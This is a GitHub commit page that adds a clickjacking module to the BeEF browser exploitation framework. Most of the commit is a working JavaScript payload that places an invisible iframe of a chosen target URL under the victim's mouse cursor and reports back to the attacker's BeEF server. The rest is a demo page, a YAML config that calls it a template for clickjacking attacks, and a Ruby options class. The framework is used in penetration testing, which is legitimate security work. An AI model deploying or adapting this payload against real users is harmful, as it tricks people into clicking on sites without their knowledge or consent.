Skip to content
Permalink
Browse files

Added clickjacking module

Fixes issue 105
  • Loading branch information
bcoles committed May 30, 2012
1 parent fdd9d2c commit 9e2ac56ea65bb628106d8aa95ee165c890558f8a
@@ -0,0 +1,4 @@
<p>&nbsp;</p>
<a href="#" onclick="javascript:alert('You clicked a link at '+window.location);">moooooooo</a>
<p>&nbsp;</p>

@@ -0,0 +1,92 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {

var offset_top = "<%= @offset_top %>";
var offset_left = "<%= @offset_left %>";
var url = "<%= @url %>";

var debug = false;
if (debug) opacity = 10; else opacity = 0;

// create container
var cjcontainer = document.createElement('div');
cjcontainer.id = "cjcontainer";
cjcontainer.setAttribute("style", "-moz-opacity:"+opacity);
cjcontainer.style.zIndex = 999;
cjcontainer.style.border = "none";
cjcontainer.style.width = "30px";
cjcontainer.style.height = "20px";
cjcontainer.style.overflow = "hidden";
cjcontainer.style.position = "absolute";
cjcontainer.style.opacity = opacity;
cjcontainer.style.filter = "alpha(opacity="+opacity+")";
cjcontainer.style.cursor = "default";
document.body.appendChild(cjcontainer);

// create iframe
var cjiframe = document.createElement('iframe');
cjiframe.id = "cjiframe";
cjiframe.src = url;
cjiframe.scrolling = "no";
cjiframe.frameBorder = "0";
cjiframe.allowTransparency = "true";
cjiframe.style.overflow = "hidden";
cjiframe.style.position = "absolute";
cjiframe.style.top = offset_top+"px";
cjiframe.style.left = offset_left+"px";
cjiframe.style.width = "200px";
cjiframe.style.height = "100px";
cjiframe.style.border = "none";
cjiframe.style.cursor = "default";
cjcontainer.appendChild(cjiframe);

// followmouse code by rsnake
// http://ha.ckers.org/weird/followmouse.html
// modified by bcoles
function followmouse(e){

var xcoord = 0;
var ycoord = 0;
var gettrailobj = function() {
if (document.getElementById)
return document.getElementById("cjcontainer").style;
else if (document.all)
return document.all.container.style;
}
if (typeof e != "undefined") {
xcoord += e.pageX - 10;
ycoord += e.pageY - 15;
} else if (typeof window.event != "undefined") {
xcoord += document.body.scrollLeft + event.clientX;
ycoord += document.body.scrollTop + event.clientY;
}
var docwidth = document.all ? document.body.scrollLeft + document.body.clientWidth : pageXOffset+window.innerWidth - 15;
var docheight = document.all ? Math.max(document.body.scrollHeight, document.body.clientHeight) : Math.max(document.body.offsetHeight, window.innerHeight)
gettrailobj().left = xcoord + "px";
gettrailobj().top = ycoord + "px";
}

// hook to mousemove event
if (window.addEventListener) {
window.addEventListener('mousemove', followmouse, false);
} else if (window.attachEvent) {
window.attachEvent('mousemove', followmouse);
}

beef.net.send('<%= @command_url %>', <%= @command_id %>, 'clickjack=hooked mousemove event');

});
@@ -0,0 +1,27 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
clickjacking:
enable: true
category: "Social Engineering"
name: "Clickjacking"
description: "This module serves as a template for clickjacking attacks.<br />Simply specify the target URL and the offset (in pixels) for the iframe content. The iframe will follow the mouse cursor."
authors: ["bcoles"]
target:
user_notify: ["FF", "C"]
not_working: ["IE"]

@@ -0,0 +1,34 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Clickjacking < BeEF::Core::Command

def self.options
configuration = BeEF::Core::Configuration.instance
uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/clickjack.html"
return [
{ 'name' => 'url', 'description' => 'Target URL', 'ui_label' => 'Target URL', 'value' => uri, 'width'=>'400px' },
{ 'name' => 'offset_top', 'description' => 'Offset Top (in pixels)', 'ui_label' => 'Offset Top (px)', 'value' => '-40', 'width'=>'150px' },
{ 'name' => 'offset_left', 'description' => 'Offset Left (in pixels)', 'ui_label' => 'Offset Left (px)', 'value' => '-10', 'width'=>'150px' }
]
end

def post_execute
content = {}
content['clickjack'] = @datastore['clickjack']
save content
end

end

0 comments on commit 9e2ac56

Please sign in to comment.
You can’t perform that action at this time.